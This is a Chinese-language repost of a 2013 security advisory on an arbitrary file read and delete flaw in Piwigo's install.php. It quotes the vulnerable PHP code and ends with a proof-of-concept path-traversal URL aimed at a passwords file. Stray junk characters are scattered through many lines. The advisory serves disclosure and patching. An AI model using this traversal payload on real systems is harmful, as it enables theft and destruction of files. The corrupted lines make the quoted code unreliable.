Piwigo任意文件泄露和任意文件删除漏洞

admin

Piwigo是用PHP编写的相册脚本。

Piwigo 2.4.6及其他版本没有正确验证install.php脚本的 'dl'参数值，在实现上存在安全漏洞，攻击者可利用这些漏洞查看受影响计算机上的任意文件，删除受影响应用上下文内的任意文件。
! b" }' e& L3 Y( w; \7 {====================================================================
/install.php:
-------------
( \* m5 g' b/ f6 g113: if (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']))
) i/ M0 _9 e7 U# T2 u9 k4 j114: {
, o& K1 A& J0 p. f115:   $filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'];
. k! y* ^* I( E, d" Q6 a8 ^' O+ k116:   header('Cache-Control: no-cache, must-revalidate');
117:   header('Pragma: no-cache');
118:   header('Content-Disposition: attachment; filename="database.inc.php"');
119:   header('Content-Transfer-Encoding: binary');
5 K2 H5 l) l1 `1 f! x8 H120:   header('Content-Length: '.filesize($filename));
$ m6 i7 l( X  C& C! X: o: d1 F5 v121:   echo file_get_contents($filename);
122:   unlink($filename);
9 X1 V8 @! o) I$ b6 R123:   exit();
124: }
0 [# l+ I% x; ]% g0 G2 h  ]  ?====================================================================
1 I% K& o; p4 a" h  e0 B& `
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
           Apache 2.4.2 (Win32)
* d! }! a  c8 ]           PHP 5.4.4
           MySQL 5.5.25a

9 ~+ A, D( B* K5 Q- i. X7 M4 [Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2013-5127
9 l4 z' j: j% T( J' IAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5127.php
5 ]& X- d2 _% Q1 X0 U, a; D4 AVendor Patch: http://piwigo.org/bugs/view.php?id=2843
/ v+ g: |- o: ?' H: j
15.02.2013

! V0 d' \7 A  E7 _--
http://localhost/piwigo/install.php?dl=../../../../../../lio_passwords.txt

0 G. F% k- ?4 p8 T  F* G1 U